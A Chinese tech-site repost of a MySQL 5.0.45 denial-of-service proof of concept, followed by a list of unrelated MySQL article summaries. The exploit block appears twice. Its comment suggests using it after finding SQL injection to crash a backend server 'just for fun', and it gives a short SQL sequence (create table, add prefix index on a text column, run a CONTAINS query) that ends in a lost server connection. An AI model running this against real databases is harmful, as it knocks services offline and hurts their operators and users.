mysql 5.0.45 (修改)拒绝服务漏洞
更新时间:2010年07月22日 23:39:50 作者:
mysql 5.0.45 (修改)拒绝服务漏洞的方法,追求安全的朋友可以参考下。
mysql 5.0.45 (修改)拒绝服务漏洞
/*
* MySQL <=6.0 possibly affected
* Kristian Erik Hermansen
* Credit: Joe Gallo
* You must have Alter permissions to exploit this bug!
* Scenario: You found SQL injection, but you want to punch backend server
* in the nuts just for fun. Start with the Alter TABLE statement on
* a table and field you know to exist. The first two SQL statements are
* simply to demostrate reproducibility...
*/
<snip>
mysql> Create TABLE `test` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,
`foo` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
Query OK, 0 rows affected
mysql> Select * FROM test Where CONTAINS(foo, ''bar'');
Empty set
mysql> Alter TABLE test ADD INDEX (foo(100));
Query OK, 0 rows affected
Records: 0 Duplicates: 0 Warnings: 0
mysql> Select * FROM test Where CONTAINS(foo, ''bar'');
ERROR 2013 : Lost connection to MySQL server during query
</snip>
/*
* MySQL <=6.0 possibly affected
* Kristian Erik Hermansen
* Credit: Joe Gallo
* You must have Alter permissions to exploit this bug!
* Scenario: You found SQL injection, but you want to punch backend server
* in the nuts just for fun. Start with the Alter TABLE statement on
* a table and field you know to exist. The first two SQL statements are
* simply to demostrate reproducibility...
*/
<snip>
mysql> Create TABLE `test` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,
`foo` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
Query OK, 0 rows affected
mysql> Select * FROM test Where CONTAINS(foo, ''bar'');
Empty set
mysql> Alter TABLE test ADD INDEX (foo(100));
Query OK, 0 rows affected
Records: 0 Duplicates: 0 Warnings: 0
mysql> Select * FROM test Where CONTAINS(foo, ''bar'');
ERROR 2013 : Lost connection to MySQL server during query
</snip>
相关文章
这篇文章主要介绍了mysql中的concat相关函数,本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下2018-11-11
在写SQL的时候,偶尔会用到两个表的数据结合在一起返回的,就需要用到UNION 和 UNION ALL,这篇文章主要给大家介绍了关于SQL中union和union all的相关资料,需要的朋友可以参考下2023-02-02
本文章来给大家提供三种在mysql中避免重复插入记录方法,主要是讲到了ignore,Replace,ON DUPLICATE KEY UPDATE三种方法,有需要的朋友可以参考一下2013-08-08
下面小编就为大家带来一篇解决MYSQL连接端口被占引入文件路径错误的问题。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧2017-08-08
这篇文章主要介绍了mysql 5.7.11 winx64安装配置教程,介绍了MySQL5.7安装及初始化,感兴趣的小伙伴们可以参考一下2016-08-08
mysql 8.0.18各版本安装及安装中出现的问题(精华总结)
这篇文章主要介绍了mysql 8.0.18各版本安装及安装中出现的问题,本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下2019-12-12
MVCC多版本并发控制,是用来在数据库中控制并发的方法,实现对数据库的并发访问用的,这篇文章主要介绍了mysql mvcc 原理详解,需要的朋友可以参考下2022-10-10
sql语句中join是一种高效的语句,下面小编来带大家详细了解一下它的详细情况2019-05-05
使用 date_sub() 函数,从 answer_date 减去相应的天数,这个天数是由上面计算的行号决定,也就是减去行号,从而来生成一个新的日期,这篇文章主要介绍了MySQL中data_sub()函数,需要的朋友可以参考下2024-02-02
这篇文章主要介绍了MYSQL表,文章主要围绕MySQL表的相关资料如创建表、删除表、修改表、等展开内容,需要的朋友可以参考一下,希望对你有所帮助2021-11-11
最新评论